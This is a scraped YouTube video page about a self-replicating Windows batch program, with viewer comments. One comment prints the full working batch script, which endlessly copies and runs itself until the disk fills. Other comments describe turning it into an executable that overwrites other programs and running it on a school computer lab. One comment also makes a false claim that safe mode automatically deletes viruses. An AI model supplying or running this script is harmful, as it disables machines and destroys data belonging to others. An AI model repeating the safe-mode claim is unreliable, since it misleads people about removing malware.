Batch Replicator - A Self Replicating Program

preview_player
Показать описание
Thank You So Much for Clicking on this Video! :)
I will try my Very best to make the Very Best Videos for you Guys!

I've put a Link to the Program Below and links to some other URL's!

Please give me some Feedback on my video. I'm Open for Suggestions!

Thanks Again! :)

Links:

Download Batch Replicator:

My Website:
Рекомендации по теме
Комментарии
Автор

@echo off
:A
set rando1=%random%
if exist ProgrammingIsFun%rando1%.bat (
goto exist
) else (
goto make
)
:make
C:
md
cd
copy /y %~nx0 ProgrammingIsFun%rando1%.bat
goto A
:exist
call ProgrammingIsFun%rando1%.bat
goto A

henryward
Автор

4 years later and I found this. When I tried making one of these in python it didnt work because of the naming system and me using __file__. Im probably gonna make python run the batch file

cookiesplays
Автор

This channel is awesome good luck with YouTube man!

snipergamingsnipershootsta
Автор

This is computer cancer. A file that only grows and grows and quickly takes up your entire hard drive. It would be terrifying if someone used this with malicious intent.

Timewarps_
Автор

all that good jazz xD | Good stuff bro

nishkaarora
Автор

a way to fix it
turn your pc into safe mode and then restart it and thyen you will see its gone cuz safe mode has a super guard that will delete worms trojans viruses ect. why hasnt the super guard installed onto the normal mode its well it will slow down the pc alot you need to wait 5 mins fro a 20 second vid to buffer

deqnqgames
Автор

my doesn't work whenever i try to open the bat file to test it it will never work and i don't know y???

hydricbluen
Автор

I have executed ur code but it is not working help me out

bhavitkanthalia
Автор

what i did to make it an actual virus is i converted it into an exe, made it so it looks for all .exe files stored on your system, (other then windows files), and replaces to code inside the exe with its own code.

hedgy
Автор

Hey I made a piece of "malware" (it's harmless) can you showcase it on your channel? It's a trojan horse and my first attempt

willmaddison
Автор

Put a virus text at the bottom and now your computer is full and can no longer startup (until it reaches full)

hawkeye
Автор

Ok Time to spam some random text under the command and copy that random text until the batch file reaches about 300MB and then run it on my school computer lab and fill up the damn hard disk. (Plus I did try it out on my own and it did work :D)

wlf
Автор

oh god, i made mine replicate exponentially on my home pc, i had to restart it because i couldn't stop it

GDCilia